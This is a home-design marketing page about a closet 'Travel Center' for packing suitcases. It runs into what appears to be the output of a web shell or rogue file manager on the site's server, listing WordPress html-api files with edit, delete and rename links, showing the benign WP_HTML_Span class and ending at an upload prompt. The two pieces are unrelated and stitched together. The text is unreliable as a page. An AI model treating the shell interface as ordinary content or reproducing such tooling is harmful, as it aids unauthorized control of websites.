Always on the go? Then you’re sure to appreciate our Travel Center option, designed to keep everything handy and make packing a snap!

You know where your suitcase has been…so you’re probably not going to want to pack it on the clean bedspread! Our travel center was inspired by customers who wanted storage plus convenience when it came to preparing to leave town.

Zirkel Gables #35092FB ml

Zirkel Gables – #35092FB

“I know where that suitcase has been, and it’s not getting packed on my clean bedspread!”

“I live for spontaneous travel. I need a place to keep overnight essentials.”

“Finding a place to store the suitcase is a pain.”

The Travel Center addresses all of these issues and more. Situated in the owner’s suite walk-in closet, packing the suitcase couldn’t be easier as everything you need is conveniently within reach. You don’t have to run up or down stairs to fetch the suitcase, and it’s stored where it doesn’t need to be constantly moved out of the way.

View more plans with a Travel Center already designed; or, talk with a plan specialist about adding one to a different plan: 800.947.7526

For more resources on thoughtful design:

Current Dir: /var/www/designbasics/wp-includes/html-api/

[FILE] class-wp-html-active-formatting-elements.php [ edit | delete | rename ]
[FILE] class-wp-html-attribute-token.php [ edit | delete | rename ]
[FILE] class-wp-html-decoder.php [ edit | delete | rename ]
[FILE] class-wp-html-open-elements.php [ edit | delete | rename ]
[FILE] class-wp-html-processor-state.php [ edit | delete | rename ]
[FILE] class-wp-html-processor.php [ edit | delete | rename ]
[FILE] class-wp-html-span.php [ edit | delete | rename ]
[FILE] class-wp-html-stack-event.php [ edit | delete | rename ]
[FILE] class-wp-html-tag-processor.php [ edit | delete | rename ]
[FILE] class-wp-html-text-replacement.php [ edit | delete | rename ]
[FILE] class-wp-html-token.php [ edit | delete | rename ]
[FILE] class-wp-html-unsupported-exception.php [ edit | delete | rename ]
[FILE] html5-named-character-references.php [ edit | delete | rename ]

Viewing: /var/www/designbasics/wp-includes/html-api/class-wp-html-span.php

<?php
/**
 * HTML API: WP_HTML_Span class
 *
 * @package WordPress
 * @subpackage HTML-API
 * @since 6.2.0
 */

/**
 * Core class used by the HTML tag processor to represent a textual span
 * inside an HTML document.
 *
 * This is a two-tuple in disguise, used to avoid the memory overhead
 * involved in using an array for the same purpose.
 *
 * This class is for internal usage of the WP_HTML_Tag_Processor class.
 *
 * @access private
 * @since 6.2.0
 * @since 6.5.0 Replaced `end` with `length` to more closely align with `substr()`.
 *
 * @see WP_HTML_Tag_Processor
 */
class WP_HTML_Span {
	/**
	 * Byte offset into document where span begins.
	 *
	 * @since 6.2.0
	 *
	 * @var int
	 */
	public $start;

	/**
	 * Byte length of this span.
	 *
	 * @since 6.5.0
	 *
	 * @var int
	 */
	public $length;

	/**
	 * Constructor.
	 *
	 * @since 6.2.0
	 *
	 * @param int $start  Byte offset into document where replacement span begins.
	 * @param int $length Byte length of span.
	 */
	public function __construct( $start, $length ) {
		$this->start  = $start;
		$this->length = $length;
	}
}

Upload File: